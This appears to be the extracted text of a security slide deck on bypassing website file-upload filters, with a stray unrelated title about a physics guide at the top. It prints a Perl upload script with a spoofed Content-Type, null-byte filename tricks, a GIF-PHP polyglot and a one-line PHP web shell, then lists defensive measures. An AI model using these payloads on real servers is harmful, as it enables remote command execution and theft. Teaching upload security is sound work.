Disha NEET Physics Guide for classes 11 and 12.pdf
Bypass file upload restrictions
1. BYPASS FILE UPLOAD RESTRICTIONS
ON WEBSITES
AND SECURITY MEASURES
By K. Subramanian
K. R. Mukesh
2. File upload
• Necessity
• Social networking websites, blogs, File
sharing, etc.
• Web developers do not consider the threats
• Files should be sanitized
• If not, leads to local file inclusion and hacking
• Filtering mechanisms
4. Content-Type verification
• HTTP POST – MIME type
Content-Disposition: form-data;
name="uploaded file []";filename="18.jpg"rn
Content-Type : image/jpegrnr <file content>
• To bypass this filter,
edit the Content-Type
to an applicable one.
#!/usr/bin/perl
#
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$req = $ua->request(POST
'http://example.com/upload.PHP',
Content_Type => 'form-data',
Content => [
userfile => ["sh.PHP", "sh.PHP",
"Content-Type" =>
"application/pdf"],
],
);
print $req->as_string();
5. An easy way – Tamper data
• Tamper data – Mozilla add-on allows to
modify the POST data before submit
6. Filename extension verification
• Check the extension of the file
• Filter out malicious extensions
$blacklist = array(".php", ".phtml", ".php3", ".php4");
• To bypass this, use NULL BYTES in filename
sh.php%00.pdf
(or)
sh.asp;xx.pdf
• While uploading, extension is .pdf
• When accessed, delivered to PHP interpreter
7. File content verification
• Applicable to image files
• $imageinfo =getimagesize($_FILES['userfile']['tmp_name']);
• To bypass this, manually craft an image file
with an embedded PHP code
Content-Type: image/gif
GIF89a(...some binary data...)<?PHP
System($_GET[‘command’]);?>
(....binary data…)
• PHP interpreter execute the php code inside a
garbage of binary values
10. Worst case scenario
• Local file inclusion – PHP shell upload
• Simple PHP shell:
<?php System ($_GET [‘command’]);?>
• Executes commands on remote server
www.example.com/uploads/sh.php?command=‘ifconfig’
• Entire control of the server – rooting it
• Defacements, database access, credential
information theft, etc.
11. Security Measures
• Preventing direct access to the uploaded files
$uploaddir = '/var/spool/uploads/';
# Outside of root
• Block web access using .htaccess file
IndexIgnore */*
• Overhead to read and write
• Sometimes leads to potential directory
traversal attacks
12. Random file name implementation
• Prevents attacker knowing the name of the
file uploaded
• Map the names in the database
$res = $db->query("INSERT INTO uploads SET name=?,original_name=?”)
• Query while reading
• A little overhead, but secure
• Think again, leads to SQL injection
13. Conclusion
• Complicated to implement a secure file
upload facility
• Many filters = slow response. Leads to Denial
Of Service (DOS) attacks
• Best way is to maintain UPLOAD LOGS
containing user info like ip address, helpful to
trace an attacker
• Secure coding practices